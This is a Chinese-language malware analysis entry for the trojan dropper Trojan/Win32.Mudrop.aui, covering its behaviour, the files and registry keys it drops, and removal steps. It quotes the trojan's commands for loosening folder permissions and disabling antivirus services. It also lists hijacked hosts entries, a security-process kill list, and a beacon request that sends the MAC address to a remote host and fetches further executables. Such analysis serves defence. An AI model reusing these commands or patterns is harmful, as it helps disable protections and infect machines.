Trojan/Win32.Mudrop.aui是一種木馬病毒的名稱。該木馬運行後自動取得用戶完全控制許可權,關閉安全軟體,傳送本機信息給控制端,並自行下載大量病毒檔案到本地,危害極大。
基本介紹
- 中文名:Trojan/Win32.Mudrop.aui
- 病毒類型: 木馬
- 公開範圍: 完全公開
- 危害等級: 4
病毒簡介,行為描述,清除方法,
病毒簡介
病毒標籤: 病毒名稱: Trojan/Win32.Mudrop.aui[Dropper]
檔案 MD5: 6CF94B87CBEABFA0CEC421F3E4827823
檔案長度: 13,840 位元組
感染系統: Windows98以上版本
開發工具: Microsoft Visual C++ 6.0
加殼類型: NsPacK V3.7
病毒描述: 該惡意代碼檔案為木馬類,病毒運行後動獲取大量API函式,創建病毒互斥量"907ERT"防止病毒多次運行產生衝突,遍歷%System32%目錄下是否存在"explorer.exe"檔案,調用CMD命令將%Windir%、%Temp%目錄給予當前用戶完全控制許可權,停止ekrn、AVP安全軟體服務、結束大量安全軟體進程,衍生病毒DLL檔案到%System32%目錄下,使用rundll32.exe啟動病毒DLL檔案,衍生病毒DLL到%Windir%目錄下,動態獲取病毒DLL的"FF"模組,進入該模組內後病毒判斷自身進程是否在"explorer.exe"進程中,如是則創建hosts檔案、劫持大量域名地址,調用API函式,查找含有windows 檔案保護、找到恢復檔案對話框的視窗,找到後將其視窗隱藏,在每個磁碟根目錄下創建autorun.inf檔案,添加註冊表病毒服務創建病毒驅動檔案,通過ipconfig all命令獲取本機MAC地址連線網路傳送安裝統一信息,並下載大量病毒檔案到本地。
行為描述
行為分析-本地行為:
1、病毒運行後動獲取大量API函式,創建病毒互斥量"907ERT"防止病毒多次運行產生衝突,遍歷%System32%目錄下是否存在"explorer.exe"檔案,調用CMD命令:"cmd /c cacls C:\WINDOWS /e /p everyone:f"將%Windir%、%Temp%目錄給予當前用戶完全控制許可權,使用:"cmd /c sc config ekrn start= disabled"、cmd /c sc config avp start= disabled停止ekrn、AVP安全軟體服務。
2、動態獲取病毒DLL的"FF"模組,進入該模組內後病毒判斷自身進程是否在"explorer.exe"進程中,如是則創建hosts檔案、劫持大量域名地址,調用API函式,查找含有windows 檔案保護、找到恢復檔案對話框的視窗,找到後將其視窗隱藏,在每個磁碟根目錄下創建autorun.inf檔案,通過ipconfig all命令獲取本機MAC地址連線網路傳送安裝統一信息,被劫持的hosts域名列表:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.0.0.3 adlaji.cn
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
3、監視以下進程發現後將其進程強行關閉:
rsmain.exe、scanfrm.exe、rsnetsvr.exe、rssafety.exe、avp.exe、safeboxtray.exe、360safe.exe、360safebox.exe、360tray.exe、antiarp.exe、ekrn.exe、egui.exe、ravmon.exe、ravmond.exe、ravtask.exe、ccenter.exe、ravstub.exe、ravstub.exe、rstray.exe、rstray.exe、rav.exe、rav.exe、rsaupd.exe、rsaupd.exe、agentsvr.exe、agentsvr.exe、qqdoctor.exe、drrtp.exe、mcproxy.exe、mcnasvc.exe、mcshield.exe、mpfsrv.exe、pccguide.exe、zonealarm.exe、zonealarm.exe、wink.exe、windows最佳化大師.exe、wfindv32.exe、webtrap.exe、webscanx.exe、webscan.exe、vsstat.exe、vshwin32.exe、vshwin32.exe、vsecomr.exe、vpc32.exe、vir.exe、vettray.exe、vet95.exe、vavrunr.exe、ulibcfg.exe、tsc.exe、tmupdito.exe、tmproxy.exe、tmoagent.exe、tmntsrv.exe、tds2-ntexe、tds298.exe、tca.exe、tbscan.exe、sweep95.exe、spy.exe、sphinx.exe、smtpsvc.exe、smc.exe、sirc32.exe、serv95.exe、secu.exe、scrscan.exe、scon.exe、scanpm.exe、scan32.exe、scan.exe、safeweb.exe、scam32.exe、rfw.exe、rfwmain.exe、rfwsrv.exe、rfwstub.exe、rfwproxy.exe、rescue32.exe、rav7win.exe、rav7.exe、ras.exe、pview95.exe、prot.exe、program.exe、ppppwallrun.exe、pop3trap.exe、persfw.exe、pcfwallicon.exe、pccwin98.exe、pccmain.exe、pcciomon.exe、pccclient.exe、navwnt.exe、navw32.exe、navw.exe、navsched.exe、navrunr.exe、navnt.exe、navlu32.exe、navapw32.exe、navapsvc.exe、n32acan.exe、moolive.exe、moniker.exe、mon.exe、mcafee.exe、lucomserver.exe、luall.exe、kwatch.exe、kvprescan.exe、kvmonxp.exe、krf.exe、kppmain.exe、kpfwsvc.exe、kpfw32.exe、kpfw32.exe、kissvc.exe、kavstart.exe、kav32.exe、kasmain.exe、kabackreport.exe、jed.exe、cfinet32.exe、cfinet.exe、cfind.exe、cfiaudit.exe、avwin95.exe、avsynmgr.exe、avsched32.exe、avpupd.exe、avkserv.exe、autodown.exe、antivir.exe、anti-trojan.exe、dvp95exe、dv95o.exe、dv95.exe、kaccore.exe、kmailmon.exe、nod32krn.exe、efcv.exe、avp.exe
4、病毒運行後衍生以下檔案到系統目錄下
%System32%\drivers\etc\hosts
%System32%\drivers\OLD3.tmp
%System32%\drivers\pcidump.sys
%System32%\drivers\acpiec.sys
%System32%\dllcache\acpiec.sys
%System32%\func.dll
%Windir%\LastGood\system32\drivers\acpiec.sys
%Windir%\phpi.dll
5、添加病毒註冊表服務啟動項
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\DisplayName
值: 字元串: "pcidump"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\ImagePath
值: 字元串: "System32\DRIVERS\pcidump.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Start
值: DWORD: 3 (0x3)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Type
值: DWORD: 1 (0x1)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\DisplayName
值: 字元串: "UPDATEDATA"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\ImagePath
值: 字元串: "\??\C:\WINDOWS\system32\drivers\acpiec.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\Start
值: DWORD: 3 (0x3)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\Type
值: DWORD: 1 (0x1)
行為分析-網路行為:GET /360/aa1dfh.txt?mac=00-0C-29-8C-9D-B6&ver=v1-300&key=146&os=windows HTTP/1.1
User-Agent: INet
Host: babi2009.com
Cache-Control: no-cache
描述:向該域名提交安裝統計信息,並按以下列表下載大量惡意病毒檔案
HTTP/1.1 200 OK
Content-Length: 1320
Content-Type: text/plain
Last-Modified: Thu, 25 Jun 2009 06:48:33 GMT
Accept-Ranges: bytes
ETag: "cee827f560f5c91:2c0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 30 Jun 2009 07:12:10 GMT
2:http://havvvha***.com/xiao/aa1.exe
2:http://havvvha***.com/xiao/aa2.exe
2:http://havvvha***.com/xiao/aa3.exe
2:http://havvvha***.com/xiao/aa4.exe
1:http://havvvha***.com/xiao/aa5.exe
2:http://havvvha***.com/xiao/aa6.exe
2:http://havvvha***.com/xiao/aa7.exe
2:http://havvvha***.com/xiao/aa8.exe
2:http://havvvha***.com/xiao/aa9.exe
2:http://havvvha***.com/xiao/aa10.exe
2:http://havvvha***.com/xiao/aa11.exe
2:http://havvvha***.com/xiao/aa12.exe
2:http://havvvha***.com/xiao/aa13.exe
2:http://havvvha***.com/xiao/aa14.exe
2:http://havvvha***.com/xiao/aa15.exe
2:http://havvvha***.com/xiao/aa16.exe
2:http://havvvha***.com/xiao/aa17.exe
2:http://havvvha***.com/xiao/aa18.exe
2:http://havvvha***.com/xiao/aa19.exe
2:http://havvvha***.com/xiao/aa20.exe
2:http://havvvha***.com/xiao/aa21.exe
2:http://havvvha***.com/xiao/aa22.exe
2:http://havvvha***.com/xiao/aa23.exe
2:http://havvvha***.com/xiao/aa24.exe
2:http://havvvha***.com/xiao/aa25.exe
2:http://havvvha***.com/xiao/aa26.exe
2:http://havvvha***.com/xiao/aa27.exe
2:http://havvvha***.com/xiao/aa28.exe
2:http://havvvha***.com/xiao/aa29.exe
2:http://havvvha***.com/xiao/aa30.exe
2:http://havvvha***.com/xiao/aa31.exe
2:http://havvvha***.com/xiao/aa32.exe
2:http://havvvha***.com/xiao/aa33.exe
2:http://havvvha***.com/xiao/aa34.exe
2:http://havvvha***.com/xiao/aa35.exe
2:http://havvvha***.com/xiao/aa36.exe
2:http://havvvha***.com/xiao/1.exe
註:%System32%是一個可變路徑。病毒通過查詢作業系統來決定當前System資料夾的位置。
%Windir% WINDODWS所在目錄
%DriveLetter% 邏輯驅動器根目錄
%ProgramFiles% 系統程式默認安裝目錄
%HomeDrive% 當前啟動的系統的所在分區
%Documents and Settings% 當前用戶文檔根目錄
%Temp% \Documents and Settings\當前用戶\Local Settings\Temp
%System32% 系統的 System32資料夾
Windows2000/NT中默認的安裝路徑是C:\Winnt\System32
windows95/98/me中默認的安裝路徑是C:\Windows\System
windowsXP中默認的安裝路徑是C:\Windows\System32
清除方法
清除方案: 1、使用安天防線可徹底清除此病毒(推薦)。
2、手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
推薦使用ATool管理工具。
(1) 使用ATOOL“進程管理”關閉病毒相關進程,結束rundll32.exe
(2)刪除病毒連線網路下載的大量病毒衍生的檔案 (註:病毒下載的列表內容會隨時更換,所以衍生的檔案也有可能變化)
%System32%\drivers\etc\hosts
%System32%\drivers\OLD3.tmp
%System32%\drivers\pcidump.sys
%System32%\drivers\acpiec.sys
%System32%\dllcache\acpiec.sys
%System32%\func.dll
%Windir%\LastGood\system32\drivers\acpiec.sys
%Windir%\phpi.dll
(3)刪除病毒添加的註冊表服務
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump
刪除Services 鍵值下的pcidump主鍵值
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA
刪除UPDATEDATA 鍵值下的pcidump主鍵值
